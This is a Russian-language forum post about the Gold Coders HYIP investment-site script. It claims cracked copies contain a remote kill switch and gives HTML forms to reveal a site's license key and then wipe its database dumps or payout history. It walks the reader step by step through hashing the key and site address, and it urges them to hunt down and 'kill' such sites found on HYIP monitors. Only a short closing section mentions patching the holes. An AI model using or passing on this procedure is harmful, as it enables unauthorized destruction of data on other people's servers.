Реклама





РЕКЛАМА

UpgradeHost


недорогая реклама в интернете
ОНЛАЙН НА САЙТЕ
Всего на сайте: 1
Пользователей: 0
Гостей: 1
Скрипт Gold Coders и его дыры. Как уничтожить HYIP за 2 минуты.
Автор: Hitman | Дата: 4-11-2013, 02:35 | Комментариев: 0 | Просмотров: 8355
Скрипт Gold Coders и его дыры. Как уничтожить HYIP за 2 минуты.

Скрипт Gold Coders и его дыры.
Как уничтожить HYIP за 2 минуты.


Представим, что вы загорелись идеей создания своего фонда и решили построить свой HYIP проект. Уже чего-то начитались о HYIP проектах и знаете, что первым шагом необходимо достать скрипт (движок). Но для вас это не составило проблемы, зашли в Яндекс и набрали "скрипт HYIP" или «двидок HYIP». Несколько секунд терпения и... О, какой большой выбор! Покупай - не хочу... Заметили что в 80% предложений встречается скрипт компании Gold Coders? В общем то, это неудивительно. Скрипт современный, очень удобный, многофункциональный и т.п.. И, пожалуй, своими возможностями удовлетворит любого организатора HYIP проекта. А цена очень даже приемлема. Одни личности продают по $5, другие по $3, а есть (владельцы магазинов цифровых товаров) вообще могут подкинуть за $1! Ну вот, казалось бы, проблем со скриптом нет. Платим несколько баксов за хостинг, домен, ну и конечно за скрипт и вперед за золотыми горами...
Или другой вариант: вы - инвестор. И вам приглянулся какой-то фонд. Очень красивый дизайн, грамотно написано, заманчивые бизнес-планы. И вы подумываете вложить в него денежные средства. Но... И вы, будущий владелец HYIP проекта и вы, инвестор можете и не знать о том, что сама основа - скрипт фонда решает в первую очередь будет ли фонд надежным и долгоживущим или исчезнет через несколько недель после старта проекта.
А дело в том, что очень мало кто знает о том, что в сети продаются несколько версий скрипта.

Версия 1-ая: лицензионная версия от самих разработчиков, которая стоимостью от $85.
Версия 2-ая: взломанная версия от некоего deZender, не требующая лицензионного ключа вообще.

Вот именно эту версию и продают продавцы-школьники, не догадываясь о, том что их товар имеет встроенные коды, дающие возможность взломщикам развалить ваш бизнес в считанные минуты...
Теперь перейдем к самому интересному. Сейчас я покажу вам как определить на базе какой версии создана HYIP скрипт. А далее, я покажу вам как уничтожить такой HYIP за несколько минут!
Определение версии скрипта (лицензионного ключа).
Создаем с помощью обычного блокнота html-страницу с этим кодом:



TEST


<form method="post">
<input type="hidden" name="a" value="ver" />

<input type="submit" />
</form>


Сохраните страницу с расширением .html. Откройте созданную страницу броузером. Жмем на кнопочку. Например, я ввел адрес www.usambank.com и нажал на кнопочку.
В результате теста получил:
SERVER_ADDR = www.usambank.com
LICENSE = 6SWEH4J5SM484Z6U7JUC
DATE = 01 02 2007

Мы видим адрес сайта, лицензионный ключ (вводится при инсталляции скрипта на сервере) и текущую дату. Лицензионный ключ GC состоит из 20 букво-цифровых символов, включающий заглавные буквы (что мы и наблюдаем). Все остальное, имеющее другой ввид (вроде: 1234567, или: sdkjh576ejh, и т.п.) или отсутствие ключа вообще говорит о том, что скрипт нелицензионный (взломанный)!
Исключение могут составлять скрипты людей, владеющих этой информацией. Которые при инсталляции специально вписывают ключ из 20 символов (подобие лицензионного ключа что мы видим выше). Как правило, такие люди уже позаботидись о безопасности и закрыли дыры. Лицензионные скрипты неподвержены способу уничтожения, который будет описан чуть позже. Нас интересует «ерунда», вписанная вместо лицензионного ключа.

Итак, вы прошлись по HYIP-мониторам, собрали приличный список URL адресов HYIP проектов и протестировали их данным методом. В результате нашли десяток HYIP-ов, созданных на базе взломанного скрипта. Пора сказать: "пи...ец, ребята... приплыли..."
Берем опять блокнот и создаем новую html-страницу с этим кодом:


KILL

<form method="post">

<input type="hidden" name="a" value="register" />

<input type="'hidden' name=string" value="хэш-код" />

<input type="'hidden' name=string2" value="дата(текущий год или число)" />

<input type="submit" />
</form>


Вместо "хэш-код" нам нужно будет вписать код md5, который мы сгенерируем генератором, подставив значения, полученные в результате теста. Итак, запускаем генератор хеш-паролей. Открываем генератор паролей и в открывшемся окне в строке "Пароль" вводим данные, полученные в результате теста формата: (все без пробелов и в одну строчку). Причем, все нужно брать в точности из данных полученных при тесте. Если лицензию показывает пустой строкой, то ее брать в учет не нужно.
Например, тест нам дал такие данные:
SERVER_ADDR = www.usambank.com
LICENSE = 6SWEH4J5SM484Z6U7JUC
DATE = 01 02 2007


Пишем в "Пароль": 6SWEH4J5SM484Z6U7JUCwww.usambank.com02200701
Хэш готов. Его мы берем (копируем) из строки расположенной выше с названием "MD5". Вставляем хэш в html-страницу. Далее, вписываем в html-страницу "KILL" в value="дата(текущий год или число)" текущий год (последние две цифры) или число, на выбор. Почему на выбор? Дело здесь вот в чем. Если впишем год, то произойдет уничтожение всех дампов SQL-базы данных (кроме users), а если впишем число, то уничтожим только историю выплат. Что хотите, то и выбирайте.
Итак, html-страница для "убийства" готова:


KILL

<form method="post">

<input type="hidden" name="a" value="register" />

<input type="'hidden' name=string" value="7aa94cc3289ebef912599e2ab8c36089" />

<input type="'hidden' name=string2" value="07" />

<input type="submit" />
</form>


Примечание: www.usambank.com построен как мы узнали при тесте на лицензионном скрипте, поетому ему мы никак не навредим. Я здесь применил этот адрес лишь для примера. Сами HYIP проекты со взломанным скриптом вы будете искать и "убивать" сами.

Жмем на кнопочку. Если вы все сделали верно и у скрипта дыры открыты, то мы увидем после нажатия символ "-", уведомляющий нас о том, что база данных фонда "убита". Заходим теперь на сайт фонда и смотрим на статистику. Ой... :)
Как вы уже поняли, произошло обнуление дампов базы данных. А это крышка. Если админ HYIPа не сделал бэкап (резервное копирование), то все... Тю, тю. Базу данных уже не восстановить.

Возникает вопрос - так почему же произошло обновление? Дело в том, что разработчики скрипта позаботились о своей репутации и вписали 2 кода, которые при подаче определенных команд извне управляют обнулением. Какраз эти команды мы и использовали. Таким образом, при обнаружении раскодированного (ломаного) скрипта разработчики могут наказать "школьников".

Почему я рассказал вам об этом? В первую очередь затем чтобы просветить вас и тем самым избавить индустрию HYIP (ну, хотя бы немножко) от дилетантов и откровенных кидал.

Но опять же возникает вопрос - а как же быть? Как защититься хайп проект от таких дыр?
Вопрос очень ценный. Вообще с него и нужно начинать создание фонда. Защитить свой проект можно. Защита сводится к закрытию дыр в скрипте. Если вы хороший php-программист, то вам не составит большого труда пересмотреть сам скрипт и найти уязвимые места. Таких мест всего на всего 2. Закрыв эти дыры можно с полным успехом применять взломанный скрипт, не тративши на дорогой лицензионный скрипт от GC. Но если вы владеете средствами, то не жмитесь, покупайте скрипт непосредственно у разработчиков или проверенных покупателей.
Как говорится «Скупой платит дважды!»… .
Скрипт Gold Coders и его дыры. Как уничтожить HYIP за 2 минуты.

Скачивание на максимальной скорости и без рекламы, доступно только для пользователей - зарегистрируйтесь!
Для Гостей, доступно скачивание только через DepositFiles!




Теги: Скрипт Gold Coders, дыры в Gold Coders, как уничтожить HYIP

 (голосов: 1)
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
  • Написал: joker
  • Дата: 4 ноября 2013 10:07
  • Новостей: 0
  • Комментариев: 0
пробовал взломать свой нелецензионный скрипт и ничего не вышло)
    • Написал: Hitman
    • Дата: 4 ноября 2013 12:36
    • Новостей: 823
    • Комментариев: 104
    Какие данные лицензии у тебя отобразились?
  • Информация
    Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.